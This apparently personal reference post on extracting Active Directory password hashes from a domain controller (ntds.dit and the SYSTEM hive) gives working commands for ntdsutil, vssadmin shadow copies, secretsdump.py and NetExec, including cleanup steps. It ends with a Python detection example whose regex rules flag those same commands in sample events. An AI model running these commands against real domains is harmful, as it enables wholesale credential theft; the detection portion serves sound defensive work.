These are some scribbles if I ever need to look up how to dump AD hashes (in various ways). I might expand on this later…

ℹ️ This is nothing new; most of this can easily be found on the Internet. It is just for my own reference, so please excuse the brevity.

This post strictly limits itself to post-exploitation, after DA credentials have already been obtained.

Dumping

Requesting a Kerberos ticket first:

$ getTGT.py -dc-ip dc01.mshome.net corp.local/administrator
$ export KRB5CCNAME=administrator.ccache
$ klist

Manually, using ntdsutil:

$ getTGT.py -dc-ip dc01.mshome.net corp.local/administrator
$ export KRB5CCNAME=administrator.ccache
$ klist
$ ewp -i dc01.corp.local -k
PS C:\> ntdsutil "ac i ntds" "ifm" "create full c:\extract" quit quit
PS C:\> download "C:\extract\Active Directory\ntds.dit" .
PS C:\> download "C:\extract\registry\SYSTEM" .
PS C:\> rm C:\extract -r -force
PS C:\> exit

Manually, using VSS:

$ ewp -i dc01.corp.local -k
# In case `ntds.dit` is stored somewhere else, look up its location, and create another shadow copy if it is stored on a separate volume:
PS C:\> reg query "HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters" /v "DSA Database file"

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS\Parameters
    DSA Database file    REG_SZ    C:\Windows\NTDS\ntds.dit

PS C:\> vssadmin create shadow /for=C:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.

Successfully created shadow copy for 'C:\'
    Shadow Copy ID: {bec8207d-b03e-4e77-a956-129dbda52993}
    Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2
PS C:\> cmd /c mklink /d C:\extract \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2
PS C:\> download "C:\extract\windows\system32\config\SYSTEM" .
PS C:\> download "C:\extract\Windows\NTDS\ntds.dit" .
PS C:\> rm C:\extract
PS C:\> cmd /c vssadmin Delete Shadows /Shadow={bec8207d-b03e-4e77-a956-129dbda52993} /quiet
PS C:\> exit

Using Impacket’s secretsdump.py, either via DRSUAPI (the default) or via VSS (with the option):

$ secretsdump.py dc01.corp.local -k -no-pass -outputfile 'dcsync' [-use-vss] [-history]

Using NetExec, either via DRSUAPI (the default) or via VSS (with the option):

$ nxc smb --use-kcache dc01.corp.local --kdcHost dc01.corp.local --ntds [vss] [--history] [-M ntdsutil]

NetExec also supports dumping via its ntdsutil module, instead of a DCSync:

$ nxc smb --use-kcache dc01.corp.local --kdcHost dc01.corp.local -M ntdsutil
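From the defensive side, every method above that touches the DC directly (ntdsutil IFM, vssadmin shadow copies, the mklink trick, the registry lookup for the NTDS path) leaves a process-creation trail on the domain controller (Sysmon event 1, or 4688 with command-line auditing enabled); the DRSUAPI-based dumps do not spawn a process there and need replication auditing instead. The following Python is an added detection example, not part of the original notes: it runs command-line rules modelled on the commands above over a handful of constructed sample events, and nothing in it (host names, users, the `SAMPLE_EVENTS` records) is real telemetry.

```python
"""Flag process-creation events matching the NTDS extraction commands in the notes.
Added detection example, not from the original notes; all events are constructed."""
import re
from typing import Iterable

# Each rule: (name, regex matched case-insensitively against the full command line).
# The patterns mirror the exact commands run on the DC in the notes above.
RULES = [
    ("ntdsutil IFM media creation",
     re.compile(r"ntdsutil.*\b(ac i ntds|activate instance ntds).*\bifm\b", re.I)),
    ("vssadmin shadow copy creation",
     re.compile(r"vssadmin\s+create\s+shadow\s+/for=", re.I)),
    ("symlink into shadow copy",
     re.compile(r"mklink\b.*HarddiskVolumeShadowCopy", re.I)),
    ("NTDS database path lookup",
     re.compile(r"reg\s+query\b.*Services\\NTDS\\Parameters", re.I)),
    ("shadow copy cleanup",
     re.compile(r"vssadmin\s+delete\s+shadows", re.I)),
]

# Constructed sample events: (host, user, command line). Not real log data.
SAMPLE_EVENTS = [
    ("DC01", "CORP\\administrator",
     'ntdsutil "ac i ntds" "ifm" "create full c:\\extract" quit quit'),
    ("DC01", "CORP\\administrator", "vssadmin create shadow /for=C:"),
    ("DC01", "CORP\\administrator",
     "cmd /c mklink /d C:\\extract \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy2"),
    ("WS07", "CORP\\jdoe", "notepad.exe C:\\Users\\jdoe\\notes.txt"),   # benign
    ("DC01", "NT AUTHORITY\\SYSTEM", "vssadmin list shadows"),          # benign admin use
]

def classify(cmdline: str) -> list[str]:
    """Return the names of every rule the command line matches (empty if none)."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def scan(events: Iterable[tuple[str, str, str]]) -> list[dict]:
    """Return one alert per matching event, carrying host, user, rule names and command line."""
    alerts = []
    for host, user, cmdline in events:
        hits = classify(cmdline)
        if hits:
            alerts.append({"host": host, "user": user, "rules": hits, "cmdline": cmdline})
    return alerts

if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"[{a['host']}] {a['user']}: {', '.join(a['rules'])} <- {a['cmdline']}")
```

In production the same rules would be fed from the SIEM's process-creation events rather than the inline list, with the benign administrative uses of vssadmin (backup jobs) whitelisted by parent process or service account.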